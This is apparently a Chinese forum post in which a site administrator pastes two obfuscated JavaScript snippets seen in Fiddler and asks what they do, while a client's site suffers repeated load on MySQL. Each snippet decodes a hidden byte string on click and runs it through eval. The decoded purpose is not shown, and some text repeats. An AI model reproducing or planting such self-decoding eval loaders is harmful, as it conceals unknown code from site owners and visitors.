以下代码是我通过Fiddler无意中查看到的.
这些请求都是通过index.php发送的,并且我也查看了相关的文件,没有这些代码.
请问以下代码是什么意思?如何发送出去的???
代码1:<html><body><br><br><br><center><h3><strong style="cursor:pointer;text-decoration:underline" onclick="lk(25)">????????????</strong></h3></center><script>var nk="/data/test.php?t=GetLastestWinNu",ok="oomq",rk,pk=new Array(),qk;function lk(mk){for(rk=0;rk<qk.length;rk++)pk[rk]=qk.charCodeAt(rk);rk=55;while(rk>=4){pk[rk]=(((-(pk[rk]^248))&0xff)+68)&0xff;rk--;}for(rk=4;rk<=57;){pk[rk]=(pk[rk]-pk[rk+1])&0xff;rk++;}rk="rk=58;do{pk[rk]=(pk[rk]+pk[rk-1])&0xff;pk[rk]=pk[rk]^143;}while(--rk>=4);";eval(rk);qk="";for(rk=1;rk<pk.length-1;rk++)if(rk%6)qk+=String.fromCharCode(pk[rk]^mk);eval("rk=eval;rk(qk);");}qk="\x9dnpw\xbbF\xc4\x8b\xe5\xd3\xee\xe9\xf1\x1e\xf9\\\x01YN\x96\x92\x91\xe2\x9b\x04\xc9_\xfe\x963\xcb\x1a\xf0j\xfc|\x0c7-40C\x8b$\x9dh\xdaq\xe7\xdb!/ZDmm\xb5\xbf\x01\xe8";</script></body></html>
代码2:<html><body><br><br><br><center><h3><p style="cursor:pointer;text-decoration:underline">????????????</p></h3></center><script>var eb="/data/test.php?t=GetLastestWinNu",fb="oomq",cc,ac=new Array(),bc;function cb(db){for(cc=0;cc<bc.length;cc++)ac[cc]=bc.charCodeAt(cc);cc="cc=60;while(cc>=1){ac[cc]=(~((((-ac[cc])&0xff)>>2)|((((-ac[cc])&0xff)<<6)&0xff)))&0xff;cc--;}";eval(cc);cc=2;while(true){if(cc>61)break;ac[cc]=(ac[cc]-ac[cc+1])&0xff;cc++;}cc=60;while(true){if(cc<2)break;ac[cc]=((-((ac[cc]+ac[cc-1])&0xff))&0xff)^44;cc--;}bc="";for(cc=1;cc<ac.length-1;cc++)if(cc%5)bc+=String.fromCharCode(ac[cc]^db);cc=eval;cc(bc);}bc="\xf2\x09\x17\xdf\xf3\xd47\xa9\xef\x87\xc8\x16i\x07F\xcc%\xb9\x12\x83\xff\xbf\xd0\xb9\xa1n\xe7\xffP x\xcc\xa01\x9a\xfd\xab\xf2\xa8\xabm\xe8^e\xefZ\x90HVAC\xc7\x15\xb1-ZyKNH<\x9c@";document.getElementsByTagName("p")[0].onmouseup=function(){cb(117);};</script></body></html>
这些请求都是通过index.php发送的,并且我也查看了相关的文件,没有这些代码.
请问以下代码是什么意思?如何发送出去的???
代码1:<html><body><br><br><br><center><h3><strong style="cursor:pointer;text-decoration:underline" onclick="lk(25)">????????????</strong></h3></center><script>var nk="/data/test.php?t=GetLastestWinNu",ok="oomq",rk,pk=new Array(),qk;function lk(mk){for(rk=0;rk<qk.length;rk++)pk[rk]=qk.charCodeAt(rk);rk=55;while(rk>=4){pk[rk]=(((-(pk[rk]^248))&0xff)+68)&0xff;rk--;}for(rk=4;rk<=57;){pk[rk]=(pk[rk]-pk[rk+1])&0xff;rk++;}rk="rk=58;do{pk[rk]=(pk[rk]+pk[rk-1])&0xff;pk[rk]=pk[rk]^143;}while(--rk>=4);";eval(rk);qk="";for(rk=1;rk<pk.length-1;rk++)if(rk%6)qk+=String.fromCharCode(pk[rk]^mk);eval("rk=eval;rk(qk);");}qk="\x9dnpw\xbbF\xc4\x8b\xe5\xd3\xee\xe9\xf1\x1e\xf9\\\x01YN\x96\x92\x91\xe2\x9b\x04\xc9_\xfe\x963\xcb\x1a\xf0j\xfc|\x0c7-40C\x8b$\x9dh\xdaq\xe7\xdb!/ZDmm\xb5\xbf\x01\xe8";</script></body></html>
代码2:<html><body><br><br><br><center><h3><p style="cursor:pointer;text-decoration:underline">????????????</p></h3></center><script>var eb="/data/test.php?t=GetLastestWinNu",fb="oomq",cc,ac=new Array(),bc;function cb(db){for(cc=0;cc<bc.length;cc++)ac[cc]=bc.charCodeAt(cc);cc="cc=60;while(cc>=1){ac[cc]=(~((((-ac[cc])&0xff)>>2)|((((-ac[cc])&0xff)<<6)&0xff)))&0xff;cc--;}";eval(cc);cc=2;while(true){if(cc>61)break;ac[cc]=(ac[cc]-ac[cc+1])&0xff;cc++;}cc=60;while(true){if(cc<2)break;ac[cc]=((-((ac[cc]+ac[cc-1])&0xff))&0xff)^44;cc--;}bc="";for(cc=1;cc<ac.length-1;cc++)if(cc%5)bc+=String.fromCharCode(ac[cc]^db);cc=eval;cc(bc);}bc="\xf2\x09\x17\xdf\xf3\xd47\xa9\xef\x87\xc8\x16i\x07F\xcc%\xb9\x12\x83\xff\xbf\xd0\xb9\xa1n\xe7\xffP x\xcc\xa01\x9a\xfd\xab\xf2\xa8\xabm\xe8^e\xefZ\x90HVAC\xc7\x15\xb1-ZyKNH<\x9c@";document.getElementsByTagName("p")[0].onmouseup=function(){cb(117);};</script></body></html>
<script>
var nk="/data/test.php?t=GetLastestWinNu",ok="oomq",rk,pk=new Array(),qk;
function lk(mk){
for(rk=0;rk<qk.length;rk++)pk[rk]=qk.charCodeAt(rk);
rk=55;
while(rk>=4){
pk[rk]=(((-(pk[rk]^248))&0xff)+68)&0xff;rk--;
}
for(rk=4;rk<=57;){
pk[rk]=(pk[rk]-pk[rk+1])&0xff;rk++;
}
rk="rk=58;do{pk[rk]=(pk[rk]+pk[rk-1])&0xff;pk[rk]=pk[rk]^143;}while(--rk>=4);";
eval(rk);
qk="";
for(rk=1;rk<pk.length-1;rk++)
if(rk%6)qk+=String.fromCharCode(pk[rk]^mk);
eval("rk=eval;rk(qk);");
}
qk="\x9dnpw\xbbF\xc4\x8b\xe5\xd3\xee\xe9\xf1\x1e\xf9\\\x01YN\x96\x92\x91\xe2\x9b\x04\xc9_\xfe\x963\xcb\x1a\xf0j\xfc|\x0c7-40C\x8b$\x9dh\xdaq\xe7\xdb!/ZDmm\xb5\xbf\x01\xe8";
</script>
</body></html>
我现在客户的一个网站一天都要被攻击好多次,但找不出是什么原因,机房说没有流量攻击.
但我查看一下MYSQL,MYSQL几乎被拖死,占用大量的CPU.头痛啊,,,